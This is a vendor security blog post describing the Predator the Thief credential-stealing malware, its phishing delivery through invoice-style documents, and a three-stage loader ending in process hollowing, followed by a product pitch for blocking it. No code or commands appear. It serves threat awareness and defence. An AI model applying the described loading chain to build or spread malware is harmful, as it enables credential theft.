Predator the Thief

January 9, 2020 Ben Cohen

Predator the Thief is a stealthy credential stealing malware that focuses on collecting credentials and sensitive information like usernames, passwords, browser data and payment data.

Today, the latest versions of this malware can be found for sale on hacking forums. To keep up with the latest cybersecurity defenses, Predator is regularly maintained – consistently getting updates and improvements. The last version (3.3.4), which was released around Christmas Eve, is the stealthiest and most sophisticated one to date. It includes several tricks and mechanisms to make it hard for security products to analyze and detect. Predator the Thief targets different types of credentials like Browser, OS, and FTP client credentials and uses numerous methods to steal them from the infected machine.

Predator the Thief spreads through phishing campaigns as a doc file, frequently one designed to look like an invoice. The malware’s payload – a VBA Macro – is embedded in the doc file.

While previous versions had a wide variety of features, this latest version adds a few loading stages that make it unique.

Predator’s loading stages:

  1. The VBA Macro runs a PowerShell script.
  2. The PS command downloads three files – AutoIt3.exe, B64 encoded AutoIt script and RC4 encoded Predator the Thief – decodes the base64 script and runs it.
  3. The AutoIt script executes Predator using process hollowing, making it seem like a legitimate dllhost.exe process.

So How to Defend against Predator the Thief?  

CyberArk Labs tested the new version of the malware against the CyberArk Endpoint Privilege Manager and found that all of the Predator’s methods of attack were detected and blocked, which means that none of the protected credentials were stolen.

Endpoint Privilege Manager’s advanced credential theft protection capabilities can detect and block these attempts, protecting the OS, browser and other common programs’ credential stores.

Because it can protect against the fundamental nature of credential theft malware, Endpoint Privilege Manager is able to defend against sophisticated threats like Predator.

Attackers using malware like Predator are often seeking privileged credentials to enable privilege escalation and lateral movement. As such, credential theft protection should be integral to an organization’s security strategy to help protect sensitive data against modern threats and neutralize an attacker’s ability to execute their goals – including full network compromise.

Previous Article
Thick Client Penetration Testing Methodology
Thick Client Penetration Testing Methodology

1 Introduction 2 Common Architectures of Thick Client applications 2.1 Two-Ttier architecture 2.2 Three-Tie...

Next Article
BlackDirect: Microsoft Azure Account Takeover
BlackDirect: Microsoft Azure Account Takeover

While working on research associated with Microsoft Azure and Microsoft OAuth 2.0, we found a vulnerability...